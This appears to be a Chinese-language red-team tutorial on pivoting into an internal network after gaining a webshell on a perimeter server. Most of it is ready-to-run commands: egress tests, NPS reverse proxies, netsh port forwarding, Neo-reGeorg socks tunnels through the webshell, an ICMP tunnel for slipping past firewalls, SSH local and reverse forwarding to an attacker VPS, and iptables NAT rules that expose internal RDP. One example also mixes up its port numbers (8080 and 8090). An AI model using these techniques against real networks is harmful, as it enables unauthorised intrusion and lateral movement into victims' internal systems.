红队攻防之构建通道漫游内网

前言

当我们通过外网边界的一个入口点拿到Webshell后,想要在内网横 向拓展战果第一件事情就是要构建内网通道。

网络连通性测试

ICMP

#Windows
ping 114.114.114.114 -n 1
#Linux
ping 114.114.114.114 -c 1

HTTP

curl http://www.baidu.com

DNS

nslookup baidu.com

仅DNS出网可直接CS-DNS上线(这个后面的教程最近在写,后面抽时间会发出来)

读取本机代理

查看代理配置情况,连接它的代理试试

REG QUERY "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings"

是否存在Nginx反向代理

  • 找到Nginx目录
  • 查看配置文件
  • 例如某次实战中发现正反向都代理不出去,查看配置文件发现了nginx反代,直接连接公网IP代理的3389端口

反向代理

服务器能出网的情况下,反向代理可以穿透防火墙(需要上传文件)

  • CobaltStrike 自带的Socks代理
  • NPS(简单 自带Web管理页面、稳定跨平台、支持多级代理)

搭建NPS

项目地址:https://ehang-io.github.io/nps

sudo ./nps install	#安装
sudo nps start #启动
sudo nps stop #停止
sudo nps reload #服务端配置文件重载

配置文件地址 /etc/nps/conf/nps.conf

#web管理端口
web_port
#web界面管理密码
web_password
#web界面管理账号
web_username
#web api密钥
auth_key
#客户端以配置文件模式启动时的密钥,设置为空表示关闭客户端配置文件连接模式
public_vkey
#获取服务端authKey时的aes加密密钥,16位
auth_crypt_key

正向转发

Windows netsh 端口转发(双网卡用)

netsh仅支持TCP协议, 适用于双网卡服务器

连接外网6666端口,就是连接到内网目标上面的3389。

启动转发

#查看现有规则
netsh interface portproxy show all

#添加转发规则
netsh interface portproxy set v4tov4 listenaddress=外网IP listenport=6666 connectaddress=内网IP connectport=3389

取消转发

#删除转发规则
netsh interface portproxy delete v4tov4 listenport=6666

#xp需要安装ipv6
netsh interface ipv6 install

Neo-reGeorg 端口复用

配合Webshell,复用目标的Web服务端口开一个Socks5代理隧道。

https://github.com/L-codes/Neo-reGeorg

python3 neoreg.py generate -k password					#生成服务端
python3 neoreg.py -k password -u http://xx/tunnel.php #在本地建立Socks5代理

ICMP加密隧道

适用场景 :特殊环境下ICMP流量允许出网,穿透防火墙

工具:icmptunnel

安装服务端

git clone https://github.com/jamesbarlow/icmptunnel.git
cd icmptunnel/
make
#禁用自带的ICMP,两端都要
sysctl -w net.ipv4.icmp_echo_ignore_all=1
#服务端以root用户监听
./icmptunnel -s
(ctrl-z)
#挂后台
bg
#给隧道接口分配一个 IP 地址
ifconfig tun0 10.0.0.1 netmask 255.255.255.0

客户端连接

./icmptunnel <server-IP>
(ctrl-z)
bg
#给隧道接口分配一个 IP 地址
ifconfig tun0 10.0.0.2 netmask 255.255.255.0

现在,我们拥有一个端到端基于 ICMP 数据包的隧道,测试SSH连接

ssh root@10.0.0.1

当然也可以把远程服务器当作一个加密的 SOCKS 代理:

ssh -D 8080 -N root@10.0.0.1

浏览器设置代理 socks://10.0.0.1:8080

边界代理

Windows连接

Proxifier全局代理

Linux连接

proxychains 配合MSF使用

https://github.com/rofl0r/proxychains-ng

高权限下

Linux SSH隧道

SSH一般是允许通过防火墙的,而且传输过程是加密的

本地转发(正向)

在中转VPS上执行以下命令

ssh -CfNg -L <VPS监听端口>:<目标内网IP>:<目标端口> <(root@目标外网Web服务器,会要求输入密码)>

ssh -CfNg -L 8080:10.1.1.3:3389 root@100.100.1.100

#VPS上查看8090端口是否已经连接
netstat -tulnp | grep "8090"

#连接目标内网服务器的远程桌面
VPS-IP:8090

SSH进程的本地端口映射,将本地端口转发到远端指定机器的指定端口;

在本地监听一个端口,所有访问这个端口的流量都会通过SSH隧道传输到远端的对应端口。

远程转发(反向)

Web服务器上执行如下命令

ssh -CfNg -R <VPS的端口>:<目标内网IP>:<目标端口> <(root@VPS-IP,会要求输入密码)>

ssh -CfNg -R 8090:10.1.1.3:3389 root@192.168.0.1

访问VPS的8090端口,即可连接内网数据库服务器的3389

VPS-IP:8090

所有访问VPS的8090端口的流量都会通过SSH隧道传输到数据库服务器的3389端口

Linux iptables 端口转发

1、编辑配置文件

vi /etc/sysctl.conf
net.ipv4.ip_forward = 1#开启IP转发

2、关闭服务

service iptables stop

3、配置规则

#需要访问的内网地址:10.1.1.11(Windows)
#内网边界web服务器:192.168.100.100(Linux)
iptables -t nat -A PREROUTING --dst 192.168.100.100 -p tcp --dport 3389 -j DNAT--to-destination 10.1.1.11:3389

iptables -t nat -A POSTROUTING --dst 10.1.1.11 -p tcp --dport 3389 -j SNAT --to-source 192.168.100.100

4、保存并重启服务

service iptables save && service iptables start

这时访问Web服务器的3389就能登录到内网机器的桌面了。